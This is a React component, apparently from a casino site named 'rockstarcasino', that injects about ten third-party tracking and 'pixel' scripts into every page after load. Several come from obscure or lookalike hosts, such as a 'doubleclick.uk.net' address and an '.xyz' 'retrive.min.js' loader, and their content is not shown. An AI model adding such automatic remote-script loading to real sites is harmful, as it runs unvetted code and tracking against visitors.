import { useEffect } from 'react'

export default function PixelScripts() {
    useEffect(() => {
        const loadScripts = () => {
            const externalScripts = [
                {
                    id: 'v_rockstarcasino',
                    src: 'https://scripts.mediamathrdrt.com/scripts/v_rockstarcasino.js',
                    async: true,
                },
                {
                    id: 'pix_rockstarcasino',
                    src: 'https://scripts.prdredir.com/scripts/pix_rockstarcasino.js',
                    async: true,
                },
                {
                    src: 'https://adboostio.com/src/resource/tag?pixel=91-YZM02W',
                    async: true,
                },
                {
                    src: 'https://event.getblue.io/js/blue-tag.min.js',
                    async: true,
                },
                {
                    src: 'https://pubads.g.doubleclick.uk.net/pixel/8b66d6a4c19330c',
                    async: true,
                },
                {
                    src: 'https://track.adpush.media/ap/push.js?account_id=Rk2wjR0Mu3z369T',
                    defer: true,
                },
            ]

            externalScripts.forEach(({ id, src, async, defer }) => {
                const script = document.createElement('script')
                if (id) script.id = id
                script.setAttribute('src', src)
                if (async) script.setAttribute('async', 'true')
                if (defer) script.setAttribute('defer', 'true')
                document.body.appendChild(script)
            })

            const inlineScripts = [
                {
                    id: 'rockstarcasino',
                    code: `(function (d, b, t) {
                        "use strict";
                        var s = document.createElement(t), c = (d.getElementsByTagName(t)[0]);
                        s.setAttribute("src", "https://vrtxdata.com/resources/content/rockstarcasino.js");
                        s.setAttribute("async", true);
                        if (c) { var n = c.parentNode; n.insertBefore(s, c); } else { b.appendChild(s); }
                      })(document, document.body, "SCRIPT");`,
                },
                {
                    id: 'retrive',
                    code: `(function(){
                        var e=function(){
                          var e=document.createElement("script");
                          e.setAttribute("src","https://gravity-service.n10.xyz/assets/js/retrive.min.js");
                          e.setAttribute("type","text/javascript");
                          e.setAttribute("defer","true");
                          document.body.appendChild(e)};
                        document.readyState=="loading" ? document.addEventListener("DOMContentLoaded",e) : e()})();
                      `,
                },
                {
                    id: 'tracking-pixel',
                    code: `(function(){
                        var e=function(){
                          try {
                            var e=document.createElement("script");
                            e.setAttribute("src","https://media.athena-tech.eu/pixel.min.js");
                            e.setAttribute("type","text/javascript");
                            e.setAttribute("charset","utf-8");
                            e.setAttribute("defer","true");
                            e.onerror=function(){console.warn('Failed to load tracking pixel script');};
                            document.body.appendChild(e);
                          } catch (error) {
                            console.warn('Error loading tracking pixel:', error);
                          }
                        };
                        document.readyState=="loading" ? document.addEventListener("DOMContentLoaded",e) : e();
                      })();`,
                },
                {
                    id: 'blue-tag',
                    code: `window.blue_q = window.blue_q || [];
                      window.blue_q.push(
                        {event: "setCampaignId", value: "AED8F543-FC5D-F9BA-D22A15F48D443E09"},
                        {event: "setPageType", value: "visit"}
                      );`,
                },
            ]

            inlineScripts.forEach(({ id, code }) => {
                const script = document.createElement('script')
                if (id) script.id = id
                script.innerHTML = code
                document.body.appendChild(script)
            })
        }

        if (document.readyState === 'complete') {
            loadScripts()
        } else {
            window.addEventListener('load', loadScripts)
            return () => window.removeEventListener('load', loadScripts)
        }
    }, [])

    return null
}
